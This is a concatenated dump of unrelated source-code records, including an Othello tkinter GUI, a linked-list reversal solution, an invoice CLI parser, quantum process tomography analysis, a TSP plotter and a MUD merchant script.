means the game is on initialization mode for the game board\n self.init_mode = True\n self.cell_state = othello_model.CellState()\n\n self.width = self.row_max * othello_model.CELL_WID\n self.height = self.col_max * othello_model.CELL_HEI\n\n ####################################################\n #_upper_frame\n ####################################################\n self._upper_frame = tkinter.Frame(self._root_window)\n self._upper_frame.pack(fill = 'x')\n\n # A label to show the game rule\n self._rule = tkinter.Label(self._upper_frame, text = 'FULL', bg = 'green')\n self._rule.pack()\n\n # A label to show which player is at the current turn\n self._curr_p_init_lb = tkinter.Label(self._upper_frame, text = \"Place black disc first\")\n self._curr_p_init_lb.pack(side = 'left')\n\n # A button to process the next step of the game during initialization of the board\n self._next = tkinter.Button(self._upper_frame, text = 'Next')\n self._next.bind('<Button-1>', self._change_init_to_white)\n self._next.pack(side = 'right')\n\n # Labels to show the score of each disc color\n self._black_score = None\n self._white_score = None\n\n ####################################################\n # Bottom Frame\n ####################################################\n self._bottom_frame = tkinter.Frame(self._root_window)\n self._bottom_frame.pack()\n # the game board\n self._board = tkinter.Canvas(self._bottom_frame, width = self.width, height = self.height, bg = 'green')\n self._board.pack(padx = 20, pady = 20)\n\n self._create_board(self.width, self.height)\n\n self._board.bind('<Button-1>', self._on_board_clicked)\n self._board.bind('<Configure>', self._on_canvas_resize)\n\n def _create_board(self, row, col):\n '''\n This method draws the grid lines of the game board sized row x col\n '''\n delta_x, delta_y = self._get_delta_x_y()\n\n row = row - (row%self.row_max)\n col = col - (col%self.col_max)\n\n\n if delta_x == 0 and delta_y == 0:\n delta_x = 3\n delta_y = 3\n\n for x in range(delta_x, row, delta_x):\n self._board.create_line(x, 0, x, col, fill=\"black\")\n for y in range(delta_y, col, delta_y):\n self._board.create_line(0, y, row, y, fill=\"black\")\n\n\n def _on_canvas_resize(self, event: tkinter.Event):\n '''\n This function is triggered when the user resizes the window\n of the game. It resizes the game board according to the changing size of\n the window.\n '''\n try:\n self._board.delete(tkinter.ALL)\n wid = self._board.winfo_width()\n hei = self._board.winfo_height()\n self._create_board(wid, hei)\n self._draw_discs()\n except ValueError:\n pass\n\n\n def _on_board_clicked(self, event: tkinter.Event):\n '''\n This function is triggered when the user clicks on the\n _board canvas to place a disc (or discs) for the player at the\n current turn at a cell on the board.\n Then it updates the game board.\n '''\n delta_x, delta_y = self._get_delta_x_y()\n\n row = int(event.y/delta_y)\n col = int(event.x/delta_x)\n\n if self.init_mode :\n color = othello_model.get_disc_color(self.curr_player)\n self.cell_state.add_dics(row,col,color)\n\n else:\n try:\n self.cell_state.put_discs(row,col)\n self._update_turn()\n\n except othello.GameOverException:\n self._winner_msg()\n except othello.NoAnothersMove:\n pass\n except othello.InvalidMoveError:\n pass\n finally:\n self.cell_state.update_cell_state()\n self._update_score()\n\n self._draw_discs()\n\n\n def _draw_discs(self):\n '''\n This draws all discs of each color on the game board as the cell_state\n object specifies\n '''\n discs = self.cell_state.get_all_discs()\n\n for color, coord in discs.items():\n for row,col in coord:\n self._draw_disc(row, col, color)\n\n def _draw_disc(self, row, col, color):\n '''\n This function places a disc of the given color at the\n coordinate specified by row and col\n '''\n delta_x,delta_y = self._get_delta_x_y()\n\n row *= delta_y # y coordinate\n col *= delta_x # x coordinate\n x = (delta_x/2)\n y = (delta_y/2)\n self._board.create_oval(col + (x * .5), row + (y * .5), col + (x*othello_model.DISC_DIAM) , row + (y*othello_model.DISC_DIAM)\n ,fill = color)\n\n def _change_init_to_white(self, event: tkinter.Event):\n '''\n This function changes the turn from black to white to let\n the white player place discs while initializing the board.\n It also changes the Next button into a button that starts the game,\n finishing the initialization of the game board.\n '''\n self.curr_player = 'W'\n\n self._curr_p_init_lb.destroy()\n self._next.destroy()\n\n self._curr_p_init_lb = tkinter.Label(self._upper_frame, text=\"Place white disc\")\n self._curr_p_init_lb.pack(side='left')\n\n self._next = tkinter.Button(self._upper_frame, text='GameStart')\n self._next.bind('<Button-1>', self._game_start)\n self._next.pack(side='right')\n\n\n def _game_start(self, event:tkinter.Event):\n '''\n This function is triggered when the user clicks the GameStart button.\n '''\n try:\n self.curr_player = othello_model.get_disc_color(self.first_player)\n self.init_mode = False\n b_list, w_list = self.cell_state.get_all_discs().values()\n self.cell_state.init_othello(self.row_max, self.col_max, self.first_player, self.win_cond, b_list, w_list)\n self._update_turn()\n except othello.GameOverException:\n self._winner_msg()\n except othello.NoAnothersMove:\n self._update_turn()\n finally:\n self._next.destroy()\n self._update_score()\n\n\n def _update_turn(self):\n '''\n This function updates the current turn of the game\n '''\n self.curr_player = self.cell_state.next_turn()\n self._curr_p_init_lb.destroy()\n self._curr_p_init_lb = tkinter.Label(self._upper_frame, text=\"TURN: \" + self.curr_player)\n self._curr_p_init_lb.pack()\n\n\n def _update_score(self):\n '''\n This function updates and shows the score of each disc color to the users.\n '''\n b_list, w_list = self.cell_state.get_all_discs().values()\n\n 
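# Assumes get_all_discs() returns an ordered mapping of {black: coords, white: coords};\n # dict insertion order (Python 3.7+) makes this two-value unpack deterministic.\n 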
b_score = len(b_list)\n w_score = len(w_list)\n\n if self._black_score and self._white_score != None:\n self._black_score.destroy()\n self._white_score.destroy()\n\n self._black_score = tkinter.Label(self._upper_frame, text = 'Black: ' + str(b_score))\n self._white_score = tkinter.Label(self._upper_frame, text = \"White: \" + str(w_score))\n self._black_score.pack(side = 'left', padx= 20)\n self._white_score.pack(side = 'right',padx = 20)\n\n def _winner_msg(self):\n '''\n This is making a window showing which player is the winner of the game\n based on the winning condition.\n '''\n winner = self.cell_state.winner()\n self._curr_p_init_lb.destroy()\n self._curr_p_init_lb = tkinter.Label(self._upper_frame, text=\"GAMEOVER\\nWINNER: \" + winner)\n self._curr_p_init_lb.pack(padx= 20)\n\n def _get_delta_x_y (self):\n '''\n This function returns width and column of each cell as integer\n '''\n delta_x = int(self._board.winfo_width() / self.col_max)\n delta_y = int(self._board.winfo_height() / self.row_max)\n return (delta_x, delta_y)\n\n\n","sub_path":"Othello/othello_view.py","file_name":"othello_view.py","file_ext":"py","file_size_in_byte":14672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"135698377","text":"class Solution:\n def reverseBetween(self, head, m, n):\n \"\"\"\n :type head: ListNode\n :type m: int\n :type n: int\n :rtype: ListNode\n \"\"\"\n if m == n:\n return head\n if m != 1:\n left = head\n left_prev = head\n for _ in range(m - 1):\n left_prev = left\n left = left.next\n right = left\n right_prev = left\n for _ in range(n - m + 1):\n right_prev = right\n right = right.next\n right_prev.next = None\n inner_head, inner_tail = self.reserseList(left)\n left_prev.next = inner_head\n inner_tail.next = right\n else:\n p = head \n v = head\n for _ in range(n):\n v = p\n p = p.next\n v.next = None\n head, tail = self.reserseList(head)\n tail.next = p\n\n return head\n \n def reserseList(self, head):\n if not head:\n return\n if not head.next:\n return head\n current = head\n prev = None\n while current:\n next_node = current.next\n current.next = prev\n prev = current\n current = next_node\n return prev, head \n ","sub_path":"0-100/92_reverse_linked_list2.py","file_name":"92_reverse_linked_list2.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"150102989","text":"\"\"\"Command-line interface for the program\n\"\"\"\nfrom argparse import ArgumentParser, Namespace\nfrom .config import Config\nimport datetime\nimport sys\n\n\ndef _set_date(args) -> datetime.date:\n \"\"\"Validates the date argument, parsing the date from the ISO format\"\"\"\n date: datetime.date\n try:\n date = datetime.date.fromisoformat(args)\n except ValueError:\n date = datetime.date.today()\n return date\n\n\ndef _are_dates_valid(date_start, date_end) -> bool:\n today = datetime.date.today()\n valid = True\n if date_start > today or date_end > today or date_start > date_end:\n valid = False\n return valid\n\n\ndef parse_and_get_arguments(config: Config) -> Namespace:\n parser: ArgumentParser = ArgumentParser(\n prog=\"invoices\", description=\"Creates PDF invoices from CSV tables\"\n )\n parser.add_argument(\n \"-p\",\n \"--path\",\n default=config.get(\"database_path\"),\n help=\"Path to the invoices database to render.\",\n )\n\n subparsers = parser.add_subparsers(dest=\"command\", required=True)\n parser_config = subparsers.add_parser(\n \"config\",\n 
help=\"Commands related to the program's configuration.\"\n \"Set, get values, or write the default configuration to the disk.\",\n )\n parser_config.add_argument(\"-s\", \"--set\", help=\"Set an option to a given value.\")\n parser_config.add_argument(\"-g\", \"--get\", help=\"Get the value of a given option\")\n\n parser_generate = subparsers.add_parser(\n \"generate\", help=\"Generates invoices as html files, using an html template.\"\n )\n parser_generate.add_argument(\n \"-o\",\n \"--out-path\",\n help=\"Directory to generate html files into.\"\n \"Overrides the value from your configuration file.\",\n )\n parser_generate.add_argument(\n \"-t\",\n \"--template-path\",\n help=\"Path to an html file to use as a template for the invoices.\"\n \"Overrides the value from your configuration file.\",\n )\n\n parser_render = subparsers.add_parser(\"render\", help=\"command render\")\n parser_render.add_argument(\n \"--as-pdf\",\n help=\"Render the invoices as PDF files.\"\n \"Requires the program wkhtmltopdf to render the files.\",\n )\n parser_render.add_argument(\n \"--as-png\",\n help=\"Render the invoices as PNG files.\"\n \"Requires the program wkhtmltopdf to render the files.\",\n )\n parser_render.add_argument(\n \"-s\",\n \"--start-date\",\n type=_set_date,\n default=datetime.date(1900, 1, 1),\n help=\"Only render invoices after that date. The date format should be yyyy-mm-dd, for instance, 2020-10-05 for October 5, 2020.\",\n )\n parser_render.add_argument(\n \"-e\",\n \"--end-date\",\n type=_set_date,\n default=datetime.date.today(),\n help=\"Only render invoices before that date.\",\n )\n\n args = parser.parse_args()\n\n if hasattr(args, \"start_date\") and not _are_dates_valid(\n args.start_date, args.end_date\n ):\n print(\"The start and end dates are invalid. 
Aborting.\")\n sys.exit()\n return args\n","sub_path":"invoices-cli/modules/command_line.py","file_name":"command_line.py","file_ext":"py","file_size_in_byte":3116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"618019298","text":"# import xraylib_np as xrl_np\nimport numpy as np\nimport simulation\nimport matplotlib.pyplot as plt\n\nH = np.array([0, 0, 6])\nhv = 3500\n\ntheta_min = -0.15\ntheta_max = 0.15\ntheta_step = 0.001\nx_axis = np.arange(theta_min, theta_max + theta_step, theta_step)\n\nMaterial = simulation.crystal_infor('material_info.txt')\nStrucFactor = simulation.StructureFactor(H, hv, Material)\nx_axis_real, Phase, Ref = simulation.Reflectivity(x_axis, H, hv, 1.0, 1.0, Material, mode=\"Angular\")\nx_axis_real, RC_Element, I_nor_Element = simulation.Yield('Bi', 0.0, 20, 90, 36, 1, x_axis, H, hv, 1.0, 1.0, Material)\n\n# xrl_np.XRayInit()\n# Z = np.arange(1,94,dtype=int)\n# energies = np.arange(10,10000,dtype=np.double)/100.0\n# CS = xrl_np.CS_Total_Kissel(Z,energies)\n\nf = plt.figure()\nplt.plot(x_axis_real, RC_Element)\nplt.show()","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"177257767","text":"import numpy as np\nimport qutip as qtp\nfrom pycqed.analysis import analysis_toolbox as a_tools\nfrom pycqed.analysis import composite_analysis as ca\nfrom matplotlib import pyplot as plt\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nfrom plotting_tools import *\nimport time\nimport os\n\nrotation_matrixes = [qtp.qeye(2).full(),\n qtp.sigmax().full(),\n qtp.rotation(qtp.sigmay(), np.pi / 2).full(),\n qtp.rotation(qtp.sigmay(), -np.pi / 2).full(),\n qtp.rotation(qtp.sigmax(), np.pi / 2).full(),\n qtp.rotation(qtp.sigmax(), -np.pi / 2).full()]\npauli_matrixes = [qtp.qeye(2).full(),\n qtp.sigmax().full(),\n qtp.sigmay().full(),\n qtp.sigmaz().full()]\npauli_ro = [qtp.qeye(2).full(),\n qtp.sigmaz().full()]\n\n\ndef get_rotation(idx):\n # j inner loop\n # i outer loop\n j = idx % 6\n i = ((idx - j)//6) % 6\n return np.kron(rotation_matrixes[i], rotation_matrixes[j])\n# return qtp.tensor(rotation_matrixes[i],rotation_matrixes[j])\n# return i,j\n\n\ndef get_pauli(idx):\n # j inner loop\n # i outer loop\n j = idx % 4\n i = ((idx - j)//4) % 4\n return np.kron(pauli_matrixes[i], pauli_matrixes[j])\n# return qtp.tensor(pauli_matrixes[i],pauli_matrixes[j])\n\n\ndef get_measurement_pauli(idx):\n # j inner loop\n # i outer loop\n j = idx % 2\n i = ((idx - j)//2) % 2\n return np.kron(pauli_ro[i], pauli_ro[j])\n# return qtp.tensor(pauli_ro[i],pauli_ro[j])\n\n\ndef unroll_mn(idx):\n # j inner loop\n # i outer loop\n j = idx % 16\n i = ((idx - j)//16) % 16\n return i, j\n\n\ndef unroll_lk(idx):\n # j inner loop\n # i outer loop\n j = idx % 36\n i = ((idx - j)//36) % 36\n return i, j\n\n\ndef get_pauli_txt(idx):\n # j inner loop\n # i outer loop\n j = idx % 4\n i = ((idx - j)//4) % 4\n return pauli_matrixes_txt[i]+pauli_matrixes_txt[j]\n\npauli_matrixes_txt = ['I', 'X', 'Y', 'Z']\n\n\ndef qpt_matrix_term(l, n, k, j, m):\n # l preparation index\n # k tomo index\n # j beta index\n # m,n process index\n # rho00 = qtp.Qobj(np.array([[1,0,0,0],[0,0,0,0],[0,0,0,0],[0,0,0,0]]),dims=[[2,2],[2,2]])\n ul = get_rotation(l)\n pm = get_pauli(m)\n uk = get_rotation(k)\n pj = get_measurement_pauli(j)\n pn = get_pauli(n)\n# trace = (ul.dag()*pn.dag()*uk.dag()*pj*uk*pm*ul*rho00).tr()\n trace = 
np.dot(dagger(ul), np.dot(\n dagger(pn), np.dot(dagger(uk), np.dot(pj, np.dot(uk, np.dot(pm, ul))))))[0, 0]\n# print(trace)\n return trace\n\n\ndef dagger(op):\n return np.conjugate(np.transpose(op))\n\n\ndef qtp_matrix_element(mn, lk, beta):\n # beta is wrong!\n m, n = unroll_mn(mn)\n l, k = unroll_lk(lk)\n element = 0.\n for j in range(4):\n element += beta[j]*qpt_matrix_term(l, n, k, j, m)\n# print(mn,element)\n return element\n\n\ndef calc_fidelity1(dens_mat1, dens_mat2):\n sqrt_2 = qtp.Qobj(dens_mat2).sqrtm()\n fid = ((sqrt_2 * qtp.Qobj(dens_mat1) * sqrt_2).sqrtm()).tr()\n return np.real(fid)\n\n\ndef analyze_qpt(t_start, t_stop, label): # identity tomo\n\n opt_dict = {'scan_label': label}\n\n pdict = {'I': 'I',\n 'Q': 'Q',\n 'times': 'sweep_points'}\n nparams = ['I', 'Q', 'times']\n\n tomo_scans = ca.quick_analysis(t_start=t_start, t_stop=t_stop,\n options_dict=opt_dict,\n params_dict_TD=pdict,\n numeric_params=nparams)\n assert(len(tomo_scans.TD_timestamps[:]) == 36)\n\n nr_segments = 64\n measurement_number = 36\n\n shots_q0 = np.zeros(\n (measurement_number, nr_segments, int(len(tomo_scans.TD_dict['I'][0])/nr_segments)))\n shots_q1 = np.zeros(\n (measurement_number, nr_segments, int(len(tomo_scans.TD_dict['Q'][0])/nr_segments)))\n for j in range(measurement_number):\n for i in range(nr_segments):\n shots_q0[j, i, :] = tomo_scans.TD_dict['I'][j][i::nr_segments]\n shots_q1[j, i, :] = tomo_scans.TD_dict['Q'][j][i::nr_segments]\n\n shots_q0q1 = np.multiply(shots_q1, shots_q0)\n\n avg_h1 = np.mean(shots_q0, axis=2)\n\n h1_00 = np.mean(avg_h1[:, 36:36+7], axis=1)\n h1_01 = np.mean(avg_h1[:, 43:43+7], axis=1)\n h1_10 = np.mean(avg_h1[:, 50:50+7], axis=1)\n h1_11 = np.mean(avg_h1[:, 57:], axis=1)\n\n avg_h2 = np.mean(shots_q1, axis=2)\n h2_00 = np.mean(avg_h2[:, 36:36+7], axis=1)\n h2_01 = np.mean(avg_h2[:, 43:43+7], axis=1)\n h2_10 = np.mean(avg_h2[:, 50:50+7], axis=1)\n h2_11 = np.mean(avg_h2[:, 57:], axis=1)\n\n avg_h12 = np.mean(shots_q0q1, axis=2)\n h12_00 = np.mean(avg_h12[:, 36:36+7], axis=1)\n h12_01 = np.mean(avg_h12[:, 43:43+7], axis=1)\n h12_10 = np.mean(avg_h12[:, 50:50+7], axis=1)\n h12_11 = np.mean(avg_h12[:, 57:], axis=1)\n\n avg_h12 = np.mean(shots_q0q1, axis=2)\n\n measurements_tomo = np.zeros((measurement_number*measurement_number*3))\n for i in range(measurement_number):\n # measurements_tomo[i*measurement_number*3:(i+1)*measurement_number*3] = (\n # np.array([avg_h1[i,0:36], avg_h2[i,0:36],\n # avg_h12[i,0:36]])).flatten()\n measurements_tomo[i*36:(i+1)*36] = avg_h1[i, 0:36]\n measurements_tomo[i*36+measurement_number*measurement_number:\n (i+1)*36+measurement_number*measurement_number] = avg_h2[i, 0:36]\n measurements_tomo[i*36+2*measurement_number*measurement_number:\n (i+1)*36+2*measurement_number*measurement_number] = avg_h12[i, 0:36]\n measurements_cal = np.array([[h1_00, h1_01, h1_10, h1_11],\n [h2_00, h2_01, h2_10, h2_11],\n [h12_00, h12_01, h12_10, h12_11]])\n\n t0 = time.time()\n # get the betas\n betas = np.zeros((3, 4, measurement_number))\n matrix = np.array(\n [[1, 1, 1, 1], [1, -1, 1, -1], [1, 1, -1, -1], [1, -1, -1, 1]])\n for i in range(measurement_number):\n betas[0, :, i] = np.dot(\n np.linalg.inv(matrix), measurements_cal[0, :, i])\n betas[1, :, i] = np.dot(\n np.linalg.inv(matrix), measurements_cal[1, :, i])\n betas[2, :, i] = np.dot(\n np.linalg.inv(matrix), measurements_cal[2, :, i])\n # define the matrix\n qtp_matrix = np.zeros(\n (measurement_number*measurement_number*3, 16*16), dtype=np.complex128)\n # fill the matrix\n for i in 
range(measurement_number*measurement_number):\n if ((i % 50) == 0):\n print(i/(measurement_number*measurement_number))\n l, k = unroll_lk(i)\n for s in range(16*16):\n qtp_matrix[i, s] = qtp_matrix_element(s, i, betas[0, :, l])\n qtp_matrix[i+measurement_number*measurement_number,\n s] = qtp_matrix_element(s, i, betas[1, :, l])\n qtp_matrix[i+2*measurement_number*measurement_number,\n s] = qtp_matrix_element(s, i, betas[2, :, l])\n t1 = time.time()\n # print((t1-t0)/(i+1))\n\n inv_matrix = np.linalg.pinv(qtp_matrix)\n chi_mat = np.dot(inv_matrix, measurements_tomo)\n t2 = time.time()\n\n chi_mat = chi_mat.reshape((16, 16))\n\n def fid(chi_mat, phi1, phi2, phi_2Q=np.pi, option=0):\n # fidelity calculation\n chi_mat_theory = np.zeros(chi_mat.shape, dtype=np.complex128)\n chi_mat_theory[0, 0] = 0.25\n chi_mat_theory[0, 3] = 0.25*np.exp(-1j*phi1)\n chi_mat_theory[0, 12] = 0.25*np.exp(-1j*phi2)\n chi_mat_theory[0, 15] = 0.25*np.exp(-1j*(phi1+phi2+phi_2Q))\n chi_mat_theory[3, 0] = 0.25*np.exp(1j*phi1)\n chi_mat_theory[3, 3] = 0.25\n chi_mat_theory[3, 12] = 0.25*np.exp(-1j*(phi1-phi2))\n chi_mat_theory[3, 15] = 0.25*np.exp(1j*(phi2+phi_2Q))\n chi_mat_theory[12, 0] = 0.25*np.exp(-1j*phi2)\n chi_mat_theory[12, 3] = 0.25*np.exp(-1j*(-phi1+phi2))\n chi_mat_theory[12, 12] = 0.25\n chi_mat_theory[12, 15] = 0.25*np.exp(1j*(phi1+phi_2Q))\n chi_mat_theory[15, 0] = 0.25*np.exp(1j*(phi1+phi2+phi_2Q))\n chi_mat_theory[15, 3] = 0.25*np.exp(-1j*(phi2+phi_2Q))\n chi_mat_theory[15, 12] = 0.25*np.exp(1j*(phi1+phi_2Q))\n chi_mat_theory[15, 15] = 0.25\n\n d = 4\n f_pro = calc_fidelity1(chi_mat, chi_mat_theory)\n f_avg = (((d*f_pro)+1)/(d+1))\n\n f_pro, f_avg = np.real_if_close(f_pro), np.real_if_close(f_avg)\n if option == 0:\n return np.real(f_avg)\n else:\n return np.real(f_pro)\n\n phi1_vec = np.linspace(-20, 20, 200)*np.pi/180.\n phi2_vec = np.linspace(-20, 20, 200)*np.pi/180.\n fid_mat = np.zeros((200, 200))\n\n for i, phi1 in enumerate(phi1_vec):\n for j, phi2 in enumerate(phi2_vec):\n fid_mat[i, j] = fid(chi_mat, phi1, phi2, np.pi)\n f_ave_opt = fid_mat.max()\n f_pro_opt = (f_ave_opt*5-1)/4\n\n # figures\n plot_times = np.arange(16)\n plot_step = plot_times[1]-plot_times[0]\n\n plot_x = np.arange(16)\n x_step = plot_x[1]-plot_x[0]\n\n # fig = plt.figure(figsize=(8,6))\n # ax = fig.add_subplot(111)\n fig, axs = plt.subplots(1, 2, figsize=(15, 5))\n ax = axs[0]\n cmin, cmax = -0.3, 0.3 # chi_mat.min(),chi_mat.max()\n fig_clim = [cmin, cmax]\n out = flex_colormesh_plot_vs_xy(ax=ax, clim=fig_clim, cmap='RdBu',\n xvals=plot_times,\n yvals=plot_x,\n zvals=np.real(chi_mat))\n ax.set_xlabel(r'Operators')\n ax.set_ylabel(r'Operators')\n # ax.set_xlim(xmin, xmax)\n ax.set_ylim(plot_x.min()-x_step/2., plot_x.max()+x_step/2.)\n ax.set_xlim(plot_times.min()-plot_step/2., plot_times.max()+plot_step/2.)\n ax.set_xticks(plot_times)\n ax.set_xticklabels([get_pauli_txt(i) for i in range(16)])\n ax.set_yticks(plot_x)\n ax.set_yticklabels([get_pauli_txt(i) for i in range(16)])\n # ax.set_xlim(0,50)\n ax_divider = make_axes_locatable(ax)\n cax = ax_divider.append_axes('right', size='10%', pad='5%')\n cbar = plt.colorbar(out['cmap'], cax=cax)\n cbar.set_ticks(\n np.arange(fig_clim[0], 1.01*fig_clim[1], (fig_clim[1]-fig_clim[0])/5.))\n cbar.set_ticklabels([str(fig_clim[0]), '', '', '', '', str(fig_clim[1])])\n cbar.set_label('Process Tomography')\n\n ax = axs[1]\n out = flex_colormesh_plot_vs_xy(ax=ax, clim=fig_clim, cmap='RdBu',\n xvals=plot_times,\n yvals=plot_x,\n zvals=np.imag(chi_mat))\n ax.set_xlabel(r'Operators')\n 
ax.set_ylabel(r'Operators')\n # ax.set_xlim(xmin, xmax)\n ax.set_ylim(plot_x.min()-x_step/2., plot_x.max()+x_step/2.)\n ax.set_xlim(plot_times.min()-plot_step/2., plot_times.max()+plot_step/2.)\n ax.set_xticks(plot_times)\n ax.set_xticklabels([get_pauli_txt(i) for i in range(16)])\n ax.set_yticks(plot_x)\n ax.set_yticklabels([get_pauli_txt(i) for i in range(16)])\n # ax.set_xlim(0,50)\n ax_divider = make_axes_locatable(ax)\n cax = ax_divider.append_axes('right', size='10%', pad='5%')\n cbar = plt.colorbar(out['cmap'], cax=cax)\n cbar.set_ticks(\n np.arange(fig_clim[0], 1.01*fig_clim[1], (fig_clim[1]-fig_clim[0])/5.))\n cbar.set_ticklabels([str(fig_clim[0]), '', '', '', '', str(fig_clim[1])])\n cbar.set_label('Process Tomography')\n fig.tight_layout()\n\n fig.suptitle('%s - %s: Quantum Process Tomography. F_avg = %.4f; F_opt = %.4f' % (tomo_scans.TD_timestamps[0],\n tomo_scans.TD_timestamps[\n -1],\n f_ave_opt, f_pro_opt))\n\n figname = '%s_QTP_manhattan.PNG' % tomo_scans.TD_timestamps[0]\n\n# savename = os.path.abspath(os.path.join(\n# savefolder, figname))\n# # value of 450dpi is arbitrary but higher than default\n# fig.savefig(savename, format='png', dpi=450)\n return chi_mat, f_ave_opt\n\n\ndef chi2PTM():\n return\n\n\ndef PTM2chi():\n return\n\n\ndef chi_PTM_matrices():\n return\n","sub_path":"pycqed/analysis/process_tomography.py","file_name":"process_tomography.py","file_ext":"py","file_size_in_byte":12187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"472347508","text":"from __future__ import unicode_literals\nfrom __future__ import print_function\nfrom __future__ import division\n\nimport matplotlib.pyplot as plt\nimport networkx as nx\n\ndef plot_path(tspdata, path, name):\n g = nx.Graph()\n g.add_nodes_from(range(len(tspdata.coords)))\n\n edges = [(path[i], path[i+1]) for i in range(len(path)-1)]\n g.add_edges_from(edges)\n\n pos = {}\n label_pos = {}\n for i in range(len(tspdata.coords)):\n pos[i] = (tspdata.coords[i][0], tspdata.coords[i][1])\n label_pos[i] = (pos[i][0], pos[i][1])\n\n nx.draw_networkx_nodes(g, pos, node_size=10)\n nx.draw_networkx_edges(g, pos, alpha=0.5, width=1)\n nx.draw_networkx_labels(g, label_pos, font_size=8)\n\n plt.axis('off')\n plt.title('{0}: distance = {1}'.format(name, tspdata.course_distance(path)))\n filename = 'output/{0}.png'.format(name)\n plt.savefig(filename)\n plt.close()\n # plt.show()\n\n return filename\n","sub_path":"travelling-salesman/src/tspplotter.py","file_name":"tspplotter.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"180135126","text":"from accessors.CharacterAccessor import character\r\nfrom accessors.ItemAccessor import item, itemtemplate\r\nfrom accessors.GameAccessor import GameWrap\r\nfrom data.logics.logic import logic\r\n\r\ndef HasEnoughCurrency( character1, amount ):\r\n total = 0\r\n character1.BeginItem()\r\n while character1.IsValidItem():\r\n item1 = item( character1.CurrentItem() )\r\n if item1.GetTemplateId() == \"1\": # copper pieces\r\n total = total + item1.GetQuantity()\r\n character1.NextItem()\r\n\r\n if total >= amount:\r\n return True\r\n return False\r\n\r\n\r\n\r\ndef GiveCurrency( character1, recipient, amount ):\r\n character1.BeginItem()\r\n mud = GameWrap()\r\n while character1.IsValidItem():\r\n item = item( character1.CurrentItem() )\r\n if item.GetTemplateId() == \"1\": # copper pieces\r\n mud.DoAction( \"attemptgiveitem\", 
character1.GetId(), recipient.GetId(), item.GetId(), amount, \"\" )\r\n return\r\n character1.NextItem()\r\n\r\n\r\ndef FindName( classtype, list1, search ):\r\n newsearch = search.lower()\r\n for x in list1:\r\n item = classtype( x )\r\n if item.GetName().lower() == newsearch:\r\n return x\r\n\r\n for x in list1:\r\n item = classtype( x )\r\n name = item.GetName().lower()\r\n if name.find( newsearch ) == 0 or name.find( \" \" + newsearch ) != -1:\r\n return x\r\n\r\n return False\r\n\r\n\r\nclass merchant( logic ):\r\n def Run( self, action, arg1, arg2, arg3, arg4, data ):\r\n me = character( self.me )\r\n\r\n if action == \"do\" and data == \"list\":\r\n character1 = character( arg3 )\r\n character1.DoAction( \"announce\", \"0\", \"0\", \"0\", \"0\", \"<#7F7F7F>--------------------------------------------------------------------------------\" )\r\n character1.DoAction( \"announce\", \"0\", \"0\", \"0\", \"0\", \"<#FFFFFF> Item | Cost\" )\r\n character1.DoAction( \"announce\", \"0\", \"0\", \"0\", \"0\", \"<#7F7F7F>--------------------------------------------------------------------------------\" )\r\n for x in self.iteminventory:\r\n item = itemtemplate( x )\r\n character1.DoAction( \"announce\", \"0\", \"0\", \"0\", \"0\", \"<#7F7F7F> \" + item.GetName().ljust( 42 ) + \"| \" + str( item.GetAttribute( \"value\" ) ) )\r\n character1.DoAction( \"announce\", \"0\", \"0\", \"0\", \"0\", \"<#7F7F7F>--------------------------------------------------------------------------------\" )\r\n return\r\n\r\n if action == \"do\" and data[:3] == \"buy\":\r\n itemname = data.split( None, 1 )\r\n itemname = itemname[1]\r\n character1 = character( arg3 )\r\n id1 = FindName( itemtemplate, self.iteminventory, itemname )\r\n if id1 == \"0\":\r\n character1.DoAction( \"announce\", \"0\", \"0\", \"0\", \"0\", \"Sorry, you can't buy \" + itemname + \"here!\" )\r\n return\r\n\r\n t = itemtemplate( id1 )\r\n if not HasEnoughCurrency( character1, int(t.GetAttribute( \"value\" )) ):\r\n character1.DoAction( \"announce\", \"0\", \"0\", \"0\", \"0\", \"Sorry, you don't have enough money to buy \" + t.GetName() + \"!\" )\r\n return\r\n\r\n GiveCurrency( character1, me, t.GetAttribute( \"value\" ) )\r\n self.mud.DoAction( \"spawnitem\", id1, character1.GetId(), \"1\", \"0\", \"\" )\r\n self.mud.AddActionAbsolute( 0, \"vision\", character1.GetRoom(), \"0\", \"0\", \"0\", character1.GetName() + \" buys \" + t.GetName() + \".\" )\r\n\r\n\r\n\r\n ","sub_path":"src/data/logics/characters/currency.py","file_name":"currency.py","file_ext":"py","file_size_in_byte":3525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"512110559","text":"#!/usr/bin/env python3\n##############################################################################\n# The MIT License (MIT)\n#\n# Copyright (c) 2016 Hajime Nakagami\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# 
